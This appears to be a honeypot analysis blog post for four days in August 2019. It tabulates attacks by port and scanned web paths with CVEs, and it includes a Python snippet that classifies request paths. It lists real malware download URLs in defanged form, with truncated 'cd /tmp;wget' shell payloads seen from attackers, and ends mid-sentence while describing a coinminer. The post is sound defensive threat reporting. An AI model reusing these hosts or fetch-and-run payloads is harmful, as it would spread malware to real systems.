This is the brief honeypot analysis for days 353-356 (8/7-8/10).
◾️Honeytrap
※Port 80 is excluded
<Detections by country and total detections>

<Detections by port>
| Port | Service | Count |
|---|---|---|
| 445 | smb | 17099 |
| 23 | telnet | 10956 |
| 5900 | vnc | 3070 |
| 25 | smtp | 670 |
| 2323 | telnet | 575 |
| 3389 | rdp | 564 |
| 3306 | mysql | 490 |
| 8080 | proxy | 329 |
| 9000 | cslistener | 224 |
| 8888 | ddi-tcp-1 | 223 |
| | ddi-udp-1 | |
<New malware downloads>
| malware_download | Payload example |
|---|---|
| hxxp://185[.]35[.]138[.]156/c | GET /shell?cd%20/tmp;wget% |
| hxxp://185[.]244[.]25[.]185/loot/Jaws[.]sh | GET /shell?cd%20/tmp;wget% |
| hxxp://91[.]92[.]66[.]192/curl[.]sh | CNXN............ |
| hxxp://185[.]244[.]25[.]185/loot/Jaws[.]sh | GET /shell?cd%20/tmp;wget% |
| hxxp://23[.]254[.]204[.]46/mips | POST /picsdesc.xml |
| hxxp://91[.]92[.]66[.]192/jaws[.]sh | GET /shell?cd+/tmp;wget |
| hxxp://91[.]92[.]66[.]192/rt[.]sh | POST /wanipcn.xml |
| hxxp://91[.]92[.]66[.]192/quack[.]sh | GET /shell?cd+/tmp;wget |
| hxxp://185[.]62[.]189[.]143/richard | POST /users/%2f/%2fproc%2fself%2fcomm |
| hxxps://gitee[.]com/c-888/ss/raw/master/ss/logo[.]jpg | POST /flex2gateway/amf |
<Detections by country and total detections>

<Detected path list>
| wow_path_research | target | CVE | reference | count |
|---|---|---|---|---|
| / | - | - | - | 90 |
| /admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 68 |
| /wls-wsat/CoordinatorPortType | | | | 15 |
| /TP/public/index.php | ThinkPHP | - | - | 10 |
| /jsrpc.php | Zabbix | - | - | 8 |
| /zabbix/jsrpc.php | Zabbix | - | - | 8 |
| //recordings/misc/play_page.php | FreePBX | - | https://sec23.hatenablog.com/entry/2019/07/24/233000, https://community.freepbx.org/t/incorrect-mime-type-sent-when-playing-voicemail-call-recordings-in-web-browser/16774 | 4 |
| /robots.txt | - | - | - | 4 |
| //recordings/ | FreePBX | - | https://cute-0tter.hatenablog.com/entry/2019/02/25/235730 | 3 |
| //recordings/theme/main.css | | | | 3 |
| /index.php | - | - | - | 3 |
| /phpmyadmin/index.php | phpMyAdmin | - | - | 3 |
| /pma/scripts/setup.php | phpMyAdmin | - | - | 3 |
| //hxxpmon.php | Zabbix | - | - | 2 |
| //proxies.php | Zabbix | - | - | 2 |
| /api_jsonrpc.php | Zabbix | - | - | 2 |
| /myadmin/scripts/setup.php | phpMyAdmin | - | - | 2 |
| /phpmyadmin/scripts/setup.php | | | | 2 |
| /w00tw00t.at.blackhats.romanian.anti-sec:) | phpMyAdmin | - | - | 2 |
| /zabbix//hxxpmon.php | Zabbix | - | - | 2 |
| /zabbix//proxies.php | Zabbix | - | - | 2 |
| /zabbix/api_jsonrpc.php | Zabbix | - | https://www.exploit-db.com/exploits/39937 | 2 |
| /.aws/credentials | | | | 1 |
| /.well-known/security.txt | SSL certificate | - | https://qiita.com/comefigo/items/e9b1bce93c1b615e5934 | 1 |
| /HNAP1 | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 | 1 |
| /Main_Analysis_Content.asp | | | | 1 |
| /MyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /Nmap/folder/check1565369582 | | | | 1 |
| /NmapUpperCheck1565369582 | | | | 1 |
| /acadmin.php | Webshell | - | - | 1 |
| /admin-console/login.seam | | | | 1 |
| /evox/about | Trane Tracer SC | - | https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327 | 1 |
| /favicon.ico | - | - | - | 1 |
| /images/ | - | - | - | 1 |
| /login.asp | Login Page | - | - | 1 |
| /manager/html | Tomcat | - | - | 1 |
| /mysql/admin/index.php | phpMyAdmin | - | - | 1 |
| /mysql/scripts/setup.php | | | | 1 |
| /nmaplowercheck1565369582 | | | | 1 |
| /page/maintenance/lanSettings/dns | | | | 1 |
| /phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin2/scripts/setup.php | | | | 1 |
| /scripts/ajaxPortal.lua | VMware NSX SD-WAN Edge by VeloCloud | CVE-2018-6961 | https://www.exploit-db.com/exploits/44959 | 1 |
| /sdk | Vmware | - | https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse | 1 |
| /server-status | Apache Server | - | https://github.com/mazen160/server-status_PWN | 1 |
| /sitemap.xml | xml sitemap | - | - | 1 |
| /xmlrpc.php | WordPress | - | - | 1 |
| hxxp://112.124.42.80:63435/ | Unauthorized Relay | - | - | 1 |
<Newly detected paths>
| wow_path_research | target | CVE | reference |
|---|---|---|---|
| /nmaplowercheck1565369582 | Nmap | - | - |
| /page/maintenance/lanSettings/dns | FLIR Thermal Camera FC-S/PT | - | https://www.exploit-db.com/exploits/42788 |
| /wls-wsat/CoordinatorPortType | Oracle WebLogic Server | CVE-2017-10271 | https://www.morihi-soc.net/?p=910 |
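As an added example (not the blog author's tooling), the Python below classifies request paths like those in the two tables above against a small constructed signature list and decodes the Unix timestamp that Nmap's HTTP library embeds in its three 404-check paths, so the three Nmap rows above can be recognised as one scan. The regexes, target labels and sample paths are assumptions built from the tables.

```python
import re
from datetime import datetime, timezone

# Constructed signature subset of the path table above (assumption: only these
# are classified; every other path is reported as "unclassified").
SIGNATURES = [
    (r"^/wls-wsat/CoordinatorPortType$", "Oracle WebLogic Server", "CVE-2017-10271"),
    (r"^/HNAP1$", "D-Link DIR-850L", "CVE-2015-2051"),
    (r"^/scripts/ajaxPortal\.lua$", "VMware NSX SD-WAN Edge", "CVE-2018-6961"),
    (r"^/(?:[^/?]+/)*scripts/setup\.php$", "phpMyAdmin", None),
    (r"^(?:/zabbix)?/+(?:jsrpc|api_jsonrpc|proxies)\.php$", "Zabbix", None),
]
COMPILED = [(re.compile(p), t, c) for p, t, c in SIGNATURES]
# Nmap's HTTP NSE library requests these three paths to learn how the server
# answers 404s; the digits are os.time() at scan start, shared by all three.
NMAP_RE = re.compile(r"^/(?:Nmap/folder/check|NmapUpperCheck|nmaplowercheck)(\d{9,10})$")

def classify(path):
    """Return (target, cve, extra) for one request path seen on the honeypot."""
    m = NMAP_RE.match(path)
    if m:
        started = datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc)
        return ("Nmap", None, started.strftime("%Y-%m-%d %H:%M:%S UTC"))
    for rx, target, cve in COMPILED:
        if rx.match(path):
            return (target, cve, None)
    return ("unclassified", None, None)

def summarize(paths):
    """Count hits per target; Nmap check paths sharing one timestamp count as
    a single scan rather than three separate hits."""
    counts, seen_scans = {}, set()
    for p in paths:
        target, cve, extra = classify(p)
        if target == "Nmap":
            if extra in seen_scans:
                continue
            seen_scans.add(extra)
        key = f"{target} ({cve})" if cve else target
        counts[key] = counts.get(key, 0) + 1
    return counts

# Constructed sample mirroring rows of the table above.
SAMPLE = [
    "/wls-wsat/CoordinatorPortType", "/wls-wsat/CoordinatorPortType",
    "/Nmap/folder/check1565369582", "/NmapUpperCheck1565369582",
    "/nmaplowercheck1565369582", "/HNAP1", "/pma/scripts/setup.php",
    "/zabbix//proxies.php", "/robots.txt",
]
```

The timestamp 1565369582 in the table decodes to 2019-08-09 16:53:02 UTC, i.e. inside this post's 8/7-8/10 window, which is a cheap consistency check on such paths.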
<Malware downloads>
| malware | wow_path | count | note |
|---|---|---|---|
| hxxp://3389[.]space/lx/ss/logo[.]jpg | /wls-wsat/CoordinatorPortType | 5 | coinminer |
| hxxp://3389[.]space/nw/vm[.]exe | /wls-wsat/CoordinatorPortType | 5 | coinminer |
| hxxp://185[.]164[.]72[.]155/richard | /Main_Analysis_Content.asp | 1 | Downloader |
The malware detected was coinminer-related. As one would expect, probably with rival attackers in mind, it first kills other coinminer-type processes and then
That is all.